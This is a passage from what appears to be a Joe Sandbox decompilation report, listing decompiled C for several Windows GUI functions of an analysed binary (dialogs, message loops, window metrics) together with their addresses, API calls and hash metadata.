							 *((intOrPtr*)(_t134 + 0x3c)) = _t111;
							 *(_t134 + 0x48) = _v28.left;
							 *((intOrPtr*)(_t134 + 0x4c)) = _v28.top;
						}
					} else {
						_v28.right =  *((intOrPtr*)(_t134 + 0x60)) -  *((intOrPtr*)(_t134 + 0x58)) + _v28.left + _v12;
						_v28.bottom =  *((intOrPtr*)(_t134 + 0x64)) -  *((intOrPtr*)(_t134 + 0x5c)) + _v28.top + _v8;
						_t125 = IntersectRect( &_v60,  &_v44,  &_v28);
						_t162 = _t125;
						if(_t125 != 0) {
							 *((intOrPtr*)(_t134 + 0x40)) =  *((intOrPtr*)(_t134 + 0x38)) + _v12;
							 *((intOrPtr*)(_t134 + 0x44)) =  *((intOrPtr*)(_t134 + 0x3c)) + _v8;
							 *((intOrPtr*)(_t134 + 0x50)) = _v28.right;
							 *((intOrPtr*)(_t134 + 0x54)) = _v28.bottom;
						}
					}
					 *((intOrPtr*)(_t134 + 4)) = _a4;
					 *((intOrPtr*)(_t134 + 8)) = _a8;
					return E00424C4D(_t134, _t162, 0);
				}
				if(_t143 == 0xb) {
					__eflags = _t143 - 0xa;
					if(_t143 != 0xa) {
						_t14 = __ecx + 0x30;
						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t81;
						__eflags =  *_t14;
						goto L9;
					}
					goto L7;
				} else {
					_t149 = 0x22;
					if(_t143 != 0xc) {
						_t8 = __ecx + 0x34;
						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t139;
						__eflags =  *_t8;
					} else {
						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t139;
					}
					_t83 =  *((intOrPtr*)(_t134 + 0x34)) -  *((intOrPtr*)(_t134 + 0x2c));
					goto L10;
				}
			}



















                  0x00424e62
                  0x00424e6e
                  0x00424e76
                  0x00424e7c
                  0x00424e7e
                  0x00424e86
                  0x00424e8a
                  0x00424eae
                  0x00424eae
                  0x00424eb6
                  0x00424eb9
                  0x00424eb9
                  0x00424ebc
                  0x00424ebe
                  0x00424ec0
                  0x00424ec0
                  0x00424ece
                  0x00424ee0
                  0x00424ee7
                  0x00424ef1
                  0x00424ef4
                  0x00424eff
                  0x00424f00
                  0x00424f01
                  0x00424f02
                  0x00424f05
                  0x00424f0b
                  0x00424f10
                  0x00424f77
                  0x00424f86
                  0x00424f9b
                  0x00424f9d
                  0x00424fa5
                  0x00424fab
                  0x00424fab
                  0x00424fae
                  0x00424fb4
                  0x00424fba
                  0x00424fba
                  0x00424f17
                  0x00424f23
                  0x00424f32
                  0x00424f41
                  0x00424f47
                  0x00424f49
                  0x00424f51
                  0x00424f5a
                  0x00424f60
                  0x00424f66
                  0x00424f66
                  0x00424f49
                  0x00424fc0
                  0x00424fca
                  0x00424fd5
                  0x00424fd5
                  0x00424e8f
                  0x00424ea9
                  0x00424eac
                  0x00424eb3
                  0x00424eb3
                  0x00424eb3
                  0x00000000
                  0x00424eb3
                  0x00000000
                  0x00424e91
                  0x00424e93
                  0x00424e97
                  0x00424e9e
                  0x00424e9e
                  0x00424e9e
                  0x00424e99
                  0x00424e99
                  0x00424e99
                  0x00424ea4
                  0x00000000
                  0x00424ea4

                  APIs
                  • GetSystemMetrics.USER32(0000004C), ref: 00424EDC
                  • GetSystemMetrics.USER32(0000004D), ref: 00424EE3
                  • GetSystemMetrics.USER32(0000004E), ref: 00424EEA
                  • GetSystemMetrics.USER32(0000004F), ref: 00424EF4
                  • IntersectRect.USER32(?,?,?), ref: 00424F41
                  • IntersectRect.USER32(?,?,?), ref: 00424F95
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsSystem$IntersectRect
                  • String ID:
                  • API String ID: 1124862357-0
                  • Opcode ID: d235708a7cc9a760f0fa2ff56dd837bd0a4c05237304a79e2b5da368e2937389
                  • Instruction ID: 715b25b0f11072c126adf57b0713e80f32b7b9fb693b38b32de5c86764fc73a0
                  • Opcode Fuzzy Hash: d235708a7cc9a760f0fa2ff56dd837bd0a4c05237304a79e2b5da368e2937389
                  • Instruction Fuzzy Hash: 7F519272A002199FCB54DFACD5C5A9EBBF4FF48310F1441A6E909EB24AE634E940CB94
                  Uniqueness

                  Uniqueness Score: 2.71%

                  Function 004131FC, Relevance: 9.1, APIs: 6, Instructions: 140windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E004131FC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				long _t67;
				long _t70;
				long _t77;
				intOrPtr* _t89;
				intOrPtr* _t91;
				void* _t92;
				intOrPtr* _t93;
				intOrPtr* _t97;
				void* _t105;
				void* _t109;
				intOrPtr _t111;
				void* _t126;
				intOrPtr* _t127;
				void* _t131;

				_push(0x10);
				E0042922B(E00438C61, __ebx, __edi, __esi);
				_t126 = __ecx;
				_t100 = 0;
				_t130 = 1;
				 *(_t131 - 0x1c) = 0;
				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000;
					if(__eflags == 0) {
						L19:
						_push( *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x74)) + 0x1c)));
						E00410F00(_t100,  *((intOrPtr*)(_t131 + 8)), _t126, _t130, __eflags);
						L20:
						return E00429303( *((intOrPtr*)(_t131 + 8)));
					}
					__eflags =  *(__ecx + 0x20);
					if(__eflags == 0) {
						goto L19;
					}
					E00404820(_t131 - 0x10);
					 *(_t131 - 4) = 1;
					_t130 = 0x104;
					_t67 = E00405860(_t131 - 0x10, __eflags, 0x104);
					_t100 = GetParent;
					 *(_t131 - 0x1c) = _t67;
					_t70 = SendMessageW( *(E0040E20E(GetParent, _t131 - 0x10, GetParent( *(_t126 + 0x20))) + 0x20), 0x464, 0x104,  *(_t131 - 0x1c));
					_t105 = _t131 - 0x10;
					__eflags = _t70;
					if(__eflags >= 0) {
						E0040E100(GetParent, _t105, _t126, 0xffffffff);
					} else {
						E004057B0(GetParent, _t105, _t126, 0x104, __eflags);
					}
					__eflags =  *( *((intOrPtr*)(_t131 - 0x10)) - 0xc);
					if(__eflags == 0) {
						L18:
						 *(_t131 - 4) =  *(_t131 - 4) | 0xffffffff;
						__eflags =  *((intOrPtr*)(_t131 - 0x10)) + 0xfffffff0;
						E004055F0( *((intOrPtr*)(_t131 - 0x10)) + 0xfffffff0);
						goto L19;
					} else {
						 *(_t131 - 0x1c) = E00405860(_t131 - 0x10, __eflags, _t130);
						_t77 = SendMessageW( *(E0040E20E(_t100, _t131 - 0x10, GetParent( *(_t126 + 0x20))) + 0x20), 0x465, _t130,  *(_t131 - 0x1c));
						_t109 = _t131 - 0x10;
						__eflags = _t77;
						if(__eflags >= 0) {
							E0040E100(_t100, _t109, _t126, 0xffffffff);
							E00405590( *((intOrPtr*)(_t131 + 8)), __eflags, _t131 - 0x10);
							_t111 =  *((intOrPtr*)(_t131 - 0x10));
							L9:
							E004055F0(_t111 + 0xfffffff0);
							goto L20;
						}
						E004057B0(_t100, _t109, _t126, _t130, __eflags);
						goto L18;
					}
				}
				if( *(__ecx + 0x20) == 0) {
					goto L19;
				}
				E00404820(_t131 - 0x14);
				_t127 =  *((intOrPtr*)(_t126 + 0x80));
				_push(_t131 - 0x10);
				_push(_t127);
				 *(_t131 - 4) = 0;
				if( *((intOrPtr*)( *_t127 + 0x38))() < 0) {
					L8:
					E00405590( *((intOrPtr*)(_t131 + 8)), _t138, _t131 - 0x14);
					_t111 =  *((intOrPtr*)(_t131 - 0x14));
					goto L9;
				}
				_t89 =  *((intOrPtr*)(_t131 - 0x10));
				_push(_t131 - 0x1c);
				_push(0x400000);
				_push(_t89);
				if( *((intOrPtr*)( *_t89 + 0x18))() != 1) {
					L5:
					_t91 =  *((intOrPtr*)(_t131 - 0x10));
					 *((intOrPtr*)(_t131 - 0x18)) = _t100;
					_t92 =  *((intOrPtr*)( *_t91 + 0x14))(_t91, 0x80058000, _t131 - 0x18);
					_t138 = _t92;
					if(_t92 >= 0) {
						E00405C40(_t131 - 0x14,  *((intOrPtr*)(_t131 - 0x18)));
						E0040E100(_t100, _t131 - 0x14, _t127, 0xffffffff);
						__imp__CoTaskMemFree( *((intOrPtr*)(_t131 - 0x18)));
					}
					L7:
					_t93 =  *((intOrPtr*)(_t131 - 0x10));
					 *((intOrPtr*)( *_t93 + 8))(_t93);
					goto L8;
				}
				_t97 =  *((intOrPtr*)(_t131 - 0x10));
				_push(_t131 - 0x1c);
				_push(0x20000000);
				_push(_t97);
				if( *((intOrPtr*)( *_t97 + 0x18))() == 0) {
					goto L7;
				}
				goto L5;
			}

















                  0x004131fc
                  0x00413203
                  0x00413208
                  0x0041320c
                  0x0041320e
                  0x0041320f
                  0x00413215
                  0x004132ce
                  0x004132d5
                  0x00413385
                  0x00413388
                  0x0041338e
                  0x00413393
                  0x0041339b
                  0x0041339b
                  0x004132db
                  0x004132de
                  0x00000000
                  0x00000000
                  0x004132e7
                  0x004132ec
                  0x004132ef
                  0x004132f8
                  0x00413300
                  0x00413306
                  0x0041331d
                  0x00413323
                  0x00413326
                  0x00413328
                  0x00413333
                  0x0041332a
                  0x0041332a
                  0x0041332a
                  0x0041333b
                  0x0041333f
                  0x00413376
                  0x00413379
                  0x0041337d
                  0x00413380
                  0x00000000
                  0x00413341
                  0x0041334d
                  0x00413364
                  0x0041336a
                  0x0041336d
                  0x0041336f
                  0x004133a0
                  0x004133ac
                  0x004133b1
                  0x004132be
                  0x004132c1
                  0x00000000
                  0x004132c1
                  0x00413371
                  0x00000000
                  0x00413371
                  0x0041333f
                  0x0041321e
                  0x00000000
                  0x00000000
                  0x00413227
                  0x0041322c
                  0x00413237
                  0x00413238
                  0x00413239
                  0x00413241
                  0x004132af
                  0x004132b6
                  0x004132bb
                  0x00000000
                  0x004132bb
                  0x00413243
                  0x0041324b
                  0x0041324c
                  0x00413251
                  0x00413257
                  0x0041326f
                  0x0041326f
                  0x0041327b
                  0x00413281
                  0x00413284
                  0x00413286
                  0x0041328e
                  0x00413298
                  0x004132a0
                  0x004132a0
                  0x004132a6
                  0x004132a6
                  0x004132ac
                  0x00000000
                  0x004132ac
                  0x00413259
                  0x00413261
                  0x00413262
                  0x00413267
                  0x0041326d
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00413203
                  • CoTaskMemFree.OLE32(?), ref: 004132A0
                  • GetParent.USER32(?), ref: 00413309
                  • SendMessageW.USER32(?,00000464,00000104,?), ref: 0041331D
                  • GetParent.USER32(?), ref: 00413350
                  • SendMessageW.USER32(?,00000465,00000104,?), ref: 00413364
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageParentSend$FreeH_prolog3Task
                  • String ID:
                  • API String ID: 526180827-0
                  • Opcode ID: e566723c80c9fb766318665a4cacdf553949550406e157b430afc983f0a72caf
                  • Instruction ID: 539b08ce067ba1eea6e1235fbcdf03628de7fdf567ee8bddfa80aac1f8c995a6
                  • Opcode Fuzzy Hash: e566723c80c9fb766318665a4cacdf553949550406e157b430afc983f0a72caf
                  • Instruction Fuzzy Hash: 0D514C7090011AEBCB04EFA1CC89EAFB775FF44319B10496EB521A72E1DB389951CB98
                  Uniqueness

                  Uniqueness Score: 1.59%

                  Function 0041EA88, Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E0041EA88(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t61;
				signed int _t66;
				signed int _t69;
				struct HWND__* _t70;
				signed int _t73;
				signed int _t103;
				void* _t114;
				signed int _t117;
				DLGTEMPLATE* _t118;
				struct HWND__* _t119;
				intOrPtr* _t121;
				void* _t122;

				_t116 = __edi;
				_t114 = __edx;
				_t97 = __ecx;
				_push(0x3c);
				E0042925E(E0043936D, __ebx, __edi, __esi);
				_t121 = __ecx;
				 *((intOrPtr*)(_t122 - 0x20)) = __ecx;
				_t126 =  *(_t122 + 0x10);
				if( *(_t122 + 0x10) == 0) {
					 *(_t122 + 0x10) =  *(E0042083D(0, __edi, __ecx, _t126) + 0xc);
				}
				_t117 =  *(E0042083D(0, _t116, _t121, _t126) + 0x3c);
				 *(_t122 - 0x28) = _t117;
				 *(_t122 - 0x14) = 0;
				 *(_t122 - 4) = 0;
				E00411247(0, _t97, _t117, _t121, _t126, 0x10);
				E00411247(0, _t97, _t117, _t121, _t126, 0xfc000);
				E0040E959(0, _t97, _t114, _t117, _t126);
				if(_t117 == 0) {
					_t118 =  *(_t122 + 8);
					L7:
					__eflags = _t118;
					if(__eflags == 0) {
						L4:
						_t61 = 0;
						L26:
						return E00429303(_t61);
					}
					E00404820(_t122 - 0x1c);
					 *(_t122 - 4) = 1;
					 *((intOrPtr*)(_t122 - 0x18)) = 0;
					_t66 = E00426106(__eflags, _t118, _t122 - 0x1c, _t122 - 0x18);
					__eflags = _t66;
					__eflags = 0 | _t66 == 0x00000000;
					if(__eflags != 0) {
						_push(_t118);
						E004260CA(0, _t122 - 0x38);
						 *(_t122 - 4) = 2;
						E00426026(_t122 - 0x38,  *((intOrPtr*)(_t122 - 0x18)));
						 *(_t122 - 0x14) = E00425D62(_t122 - 0x38);
						 *(_t122 - 4) = 1;
						E00425D54(_t122 - 0x38);
						__eflags =  *(_t122 - 0x14);
						if(__eflags != 0) {
							_t118 = GlobalLock( *(_t122 - 0x14));
						}
					}
					 *(_t121 + 0x44) =  *(_t121 + 0x44) | 0xffffffff;
					 *(_t121 + 0x3c) =  *(_t121 + 0x3c) | 0x00000010;
					E00410178(0, __eflags, _t121);
					_t69 =  *(_t122 + 0xc);
					__eflags = _t69;
					if(_t69 != 0) {
						_t70 =  *(_t69 + 0x20);
					} else {
						_t70 = 0;
					}
					_t119 = CreateDialogIndirectParamW( *(_t122 + 0x10), _t118, _t70, E0041E4C6, 0);
					E004055F0( *((intOrPtr*)(_t122 - 0x1c)) + 0xfffffff0);
					 *(_t122 - 4) =  *(_t122 - 4) | 0xffffffff;
					_t103 =  *(_t122 - 0x28);
					__eflags = _t103;
					if(__eflags != 0) {
						__eflags = _t119;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t103 + 0x18))(_t122 - 0x48);
							 *((intOrPtr*)( *_t121 + 0x134))(0);
						}
					}
					_t73 = E0040E2C7(0, _t119, __eflags);
					__eflags = _t73;
					if(_t73 == 0) {
						 *((intOrPtr*)( *_t121 + 0x11c))();
					}
					__eflags = _t119;
					if(_t119 != 0) {
						__eflags =  *(_t121 + 0x3c) & 0x00000010;
						if(( *(_t121 + 0x3c) & 0x00000010) == 0) {
							DestroyWindow(_t119);
							_t119 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t122 - 0x14);
					if( *(_t122 - 0x14) != 0) {
						GlobalUnlock( *(_t122 - 0x14));
						GlobalFree( *(_t122 - 0x14));
					}
					__eflags = _t119;
					_t54 = _t119 != 0;
					__eflags = _t54;
					_t61 = 0 | _t54;
					goto L26;
				}
				_push(_t122 - 0x48);
				if( *((intOrPtr*)( *_t121 + 0x134))() != 0) {
					_t118 =  *((intOrPtr*)( *_t117 + 0x14))(_t122 - 0x48,  *(_t122 + 8));
					goto L7;
				}
				goto L4;
			}















                  0x0041ea88
                  0x0041ea88
                  0x0041ea88
                  0x0041ea88
                  0x0041ea8f
                  0x0041ea94
                  0x0041ea96
                  0x0041ea9b
                  0x0041ea9e
                  0x0041eaa8
                  0x0041eaa8
                  0x0041eab0
                  0x0041eab5
                  0x0041eab8
                  0x0041eabb
                  0x0041eabe
                  0x0041eac8
                  0x0041eacd
                  0x0041ead4
                  0x0041eb01
                  0x0041eb04
                  0x0041eb04
                  0x0041eb06
                  0x0041eae8
                  0x0041eae8
                  0x0041ec3b
                  0x0041ec40
                  0x0041ec40
                  0x0041eb0b
                  0x0041eb19
                  0x0041eb1d
                  0x0041eb20
                  0x0041eb2a
                  0x0041eb31
                  0x0041eb33
                  0x0041eb35
                  0x0041eb39
                  0x0041eb44
                  0x0041eb48
                  0x0041eb58
                  0x0041eb5b
                  0x0041eb5f
                  0x0041eb64
                  0x0041eb67
                  0x0041eb72
                  0x0041eb72
                  0x0041eb67
                  0x0041eb74
                  0x0041eb78
                  0x0041eb7d
                  0x0041eb82
                  0x0041eb85
                  0x0041eb87
                  0x0041eb8d
                  0x0041eb89
                  0x0041eb89
                  0x0041eb89
                  0x0041eba7
                  0x0041eba9
                  0x0041ebae
                  0x0041ebd8
                  0x0041ebdb
                  0x0041ebdd
                  0x0041ebdf
                  0x0041ebe1
                  0x0041ebe9
                  0x0041ebf1
                  0x0041ebf1
                  0x0041ebe1
                  0x0041ebf7
                  0x0041ebfc
                  0x0041ebfe
                  0x0041ec04
                  0x0041ec04
                  0x0041ec0a
                  0x0041ec0c
                  0x0041ec0e
                  0x0041ec12
                  0x0041ec15
                  0x0041ec1b
                  0x0041ec1b
                  0x0041ec1b
                  0x0041ec12
                  0x0041ec1d
                  0x0041ec20
                  0x0041ec25
                  0x0041ec2e
                  0x0041ec2e
                  0x0041ec36
                  0x0041ec38
                  0x0041ec38
                  0x0041ec38
                  0x00000000
                  0x0041ec38
                  0x0041eadb
                  0x0041eae6
                  0x0041eafd
                  0x00000000
                  0x0041eafd
                  0x00000000

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041EA8F
                  • GlobalLock.KERNEL32(?,?,?), ref: 0041EB6C
                  • CreateDialogIndirectParamW.USER32(?,?,?,0041E4C6,00000000), ref: 0041EB9B
                  • DestroyWindow.USER32(00000000), ref: 0041EC15
                  • GlobalUnlock.KERNEL32(?), ref: 0041EC25
                  • GlobalFree.KERNEL32(?), ref: 0041EC2E
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                  • String ID:
                  • API String ID: 3003189058-0
                  • Opcode ID: b3c3285bc0f4863b7936d6c0e857eb5e25feb146a34a2935965097fc7181b108
                  • Instruction ID: 924653365d4f3961b2981b15b1c43f285f32c02dddf50d8ec133333372edc051
                  • Opcode Fuzzy Hash: b3c3285bc0f4863b7936d6c0e857eb5e25feb146a34a2935965097fc7181b108
                  • Instruction Fuzzy Hash: F351F775A00209DFCF10EFA5C8859EEBBB1BF44304F54456EF912A7291DB38AD81CB59
                  Uniqueness

                  Uniqueness Score: 0.71%

                  Function 00416B89, Relevance: 9.1, APIs: 6, Instructions: 117keyboardwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E00416B89(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __ebp;
				signed int* _t45;
				int _t46;
				void* _t53;
				signed int _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				int _t68;
				intOrPtr* _t74;

				_t64 = __ecx;
				_push(__ecx);
				_t74 = __ecx;
				_t66 = E0040ED5B(__ecx);
				_v8 = _t66;
				if(_t66 == 0) {
					E00413DD0(_t64);
				}
				_t65 =  *((intOrPtr*)(_t74 + 0x80));
				_t62 = _a8;
				_t68 = _a4;
				if(_t65 == 0) {
					L5:
					if(_t62 != 0xffff) {
						_t45 = _t74 + 0xdc;
						if( *_t45 != 0) {
							 *_t45 =  *_t45 & 0x00000000;
							if((_t62 & 0x00002000) != 0 && ( *(_t74 + 0xd0) & 0x00000001) == 0) {
								_t65 = _t74;
								 *((intOrPtr*)( *_t74 + 0x160))(2);
								_t66 = _v8;
							}
						}
						if(_t68 == 0 || (_t62 & 0x00000810) != 0) {
							 *(_t74 + 0xa8) =  *(_t74 + 0xa8) & 0x00000000;
							goto L29;
						} else {
							if(_t68 - 0xf000 > 0x1ef) {
								if(_t68 < 0xff00) {
									L25:
									 *(_t74 + 0xa8) = _t68;
									L29:
									 *(_t66 + 0x3c) =  *(_t66 + 0x3c) | 0x00000040;
									L30:
									_t46 =  *(_t74 + 0xa8);
									if(_t46 !=  *((intOrPtr*)(_t74 + 0xac))) {
										_t46 = E0040E20E(_t62, _t65, GetParent( *(_t74 + 0x20)));
										if(_t46 != 0) {
											_t46 = PostMessageW( *(_t74 + 0x20), 0x36a, 0, 0);
										}
									}
									L33:
									return _t46;
								}
								 *(_t74 + 0xa8) = 0xef1f;
								goto L29;
							}
							_t68 = (_t68 + 0xffff1000 >> 4) + 0xef00;
							goto L25;
						}
					}
					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) & 0xffffffbf;
					if( *((intOrPtr*)(_t66 + 0x68)) != 0) {
						 *(_t74 + 0xa8) = 0xe002;
					} else {
						 *(_t74 + 0xa8) = 0xe001;
					}
					SendMessageW( *(_t74 + 0x20), 0x362,  *(_t74 + 0xa8), 0);
					_t65 = _t74;
					_t53 =  *((intOrPtr*)( *_t74 + 0x16c))();
					if(_t53 != 0) {
						UpdateWindow( *(_t53 + 0x20));
					}
					if(_a12 == 0 && ( *(_t74 + 0xd0) & 0x00000001) == 0 && GetKeyState(0x79) >= 0 && GetKeyState(0x12) >= 0 &&  *((intOrPtr*)(_t74 + 0xe0)) == 0) {
						_t65 = _t74;
						 *((intOrPtr*)( *_t74 + 0x160))(2);
					}
					goto L30;
				}
				_t46 =  *((intOrPtr*)( *_t65 + 0x7c))(_t68, _t62, _a12);
				if(_t46 != 0) {
					goto L33;
				} else {
					_t66 = _v8;
					goto L5;
				}
			}














                  0x00416b89
                  0x00416b8e
                  0x00416b92
                  0x00416b99
                  0x00416b9b
                  0x00416ba0
                  0x00416ba2
                  0x00416ba2
                  0x00416ba7
                  0x00416bad
                  0x00416bb0
                  0x00416bb5
                  0x00416bcc
                  0x00416bd2
                  0x00416c77
                  0x00416c80
                  0x00416c82
                  0x00416c8b
                  0x00416c9a
                  0x00416c9c
                  0x00416ca2
                  0x00416ca2
                  0x00416c8b
                  0x00416ca7
                  0x00416ce9
                  0x00000000
                  0x00416cb1
                  0x00416cbc
                  0x00416cdb
                  0x00416ccd
                  0x00416ccd
                  0x00416cf0
                  0x00416cf0
                  0x00416cf4
                  0x00416cf4
                  0x00416d00
                  0x00416d0c
                  0x00416d13
                  0x00416d21
                  0x00416d21
                  0x00416d13
                  0x00416d27
                  0x00416d2b
                  0x00416d2b
                  0x00416cdd
                  0x00000000
                  0x00416cdd
                  0x00416cc7
                  0x00000000
                  0x00416cc7
                  0x00416ca7
                  0x00416bd8
                  0x00416be0
                  0x00416bee
                  0x00416be2
                  0x00416be2
                  0x00416be2
                  0x00416c08
                  0x00416c10
                  0x00416c12
                  0x00416c1a
                  0x00416c1f
                  0x00416c1f
                  0x00416c29
                  0x00416c6d
                  0x00416c6f
                  0x00416c6f
                  0x00000000
                  0x00416c29
                  0x00416bbe
                  0x00416bc3
                  0x00000000
                  0x00416bc9
                  0x00416bc9
                  0x00000000
                  0x00416bc9

                  APIs
                  • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 00416C08
                  • UpdateWindow.USER32(?), ref: 00416C1F
                  • GetKeyState.USER32(00000079), ref: 00416C44
                  • GetKeyState.USER32(00000012), ref: 00416C51
                  • GetParent.USER32(?), ref: 00416D05
                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00416D21
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageState$Exception@8ParentPostSendThrowUpdateWindow
                  • String ID:
                  • API String ID: 3830675576-0
                  • Opcode ID: d101b92d838daa0fa9edb1664063b490d2432b5ef523112fcfbbe748e38d08d7
                  • Instruction ID: 57fd262867cade702ce7148582579a2154035acfea75e6112e856d4255c21794
                  • Opcode Fuzzy Hash: d101b92d838daa0fa9edb1664063b490d2432b5ef523112fcfbbe748e38d08d7
                  • Instruction Fuzzy Hash: 7041B3712007059FEB208F20C848BEBB7A5FF54315F12846EE8DA56291EBB9E880CB55
                  Uniqueness

                  Uniqueness Score: 1.31%

                  Function 00425168, Relevance: 9.1, APIs: 6, Instructions: 102windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E00425168(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct tagMSG _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t36;
				intOrPtr* _t37;
				void* _t41;
				intOrPtr _t53;
				void* _t54;
				void* _t56;
				void* _t57;
				intOrPtr* _t58;

				_t55 = __edx;
				_t51 = __ecx;
				_t56 = GetCapture;
				_t57 = __ecx;
				if(GetCapture() != 0) {
					L20:
					return 0;
				}
				E0040E20E(0, _t51, SetCapture( *( *((intOrPtr*)(_t57 + 0x68)) + 0x20)));
				if(E0040E20E(0, _t51, GetCapture()) !=  *((intOrPtr*)(_t57 + 0x68))) {
					L19:
					E00424FD8(0, _t57, _t68);
					goto L20;
				} else {
					while(GetMessageW( &_v32, 0, 0, 0) != 0) {
						_t30 = _v32.message - 0x100;
						if(_t30 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if( *((intOrPtr*)(_t57 + 0x88)) != 0) {
								_t51 = _t57;
								E00424E2C(_t57, _v32.wParam, 1);
							}
							__eflags = _v32.wParam - 0x1b;
							if(__eflags != 0) {
								L18:
								_t32 = E0040E20E(0, _t51, GetCapture());
								_t68 = _t32 -  *((intOrPtr*)(_t57 + 0x68));
								if(_t32 ==  *((intOrPtr*)(_t57 + 0x68))) {
									continue;
								}
							}
							goto L19;
						}
						_t34 = _t30 - 1;
						if(_t34 == 0) {
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if(__eflags != 0) {
								_t51 = _t57;
								E00424E2C(_t57, _v32.wParam, 0);
							}
							goto L18;
						}
						_t36 = _t34 - 0xff;
						if(_t36 == 0) {
							_t53 = _v32.pt;
							_t55 = _v8;
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							_push(_t53);
							_push(_t53);
							_t37 = _t58;
							 *_t37 = _t53;
							 *((intOrPtr*)(_t37 + 4)) = _v8;
							_t51 = _t57;
							if( *((intOrPtr*)(_t57 + 0x88)) == 0) {
								E00424E62(_t51, _t56);
							} else {
								E00424DB7(_t51);
							}
							goto L18;
						}
						_t41 = _t36;
						if(_t41 == 0) {
							_t54 = _t57;
							__eflags =  *((intOrPtr*)(_t57 + 0x88));
							if(__eflags == 0) {
								E00425121(0, _t54, __eflags);
							} else {
								E0042501B(_t54, _t55, _t56, _t57, __eflags);
							}
							return 1;
						}
						if(_t41 == 0) {
							goto L19;
						}
						DispatchMessageW( &_v32);
						goto L18;
					}
					_push(_v32.wParam);
					E0041CD10();
					goto L19;
				}
			}



















                  0x00425168
                  0x00425168
                  0x00425173
                  0x00425179
                  0x0042517f
                  0x00425259
                  0x00000000
                  0x00425259
                  0x00425192
                  0x004251a2
                  0x00425252
                  0x00425254
                  0x00000000
                  0x004251a8
                  0x004251aa
                  0x004251c2
                  0x004251c7
                  0x00425227
                  0x0042522d
                  0x00425234
                  0x00425236
                  0x00425236
                  0x0042523b
                  0x0042523f
                  0x00425241
                  0x00425244
                  0x00425249
                  0x0042524c
                  0x00000000
                  0x00000000
                  0x0042524c
                  0x00000000
                  0x0042523f
                  0x004251c9
                  0x004251ca
                  0x00425212
                  0x00425218
                  0x0042521e
                  0x00425220
                  0x00425220
                  0x00000000
                  0x00425218
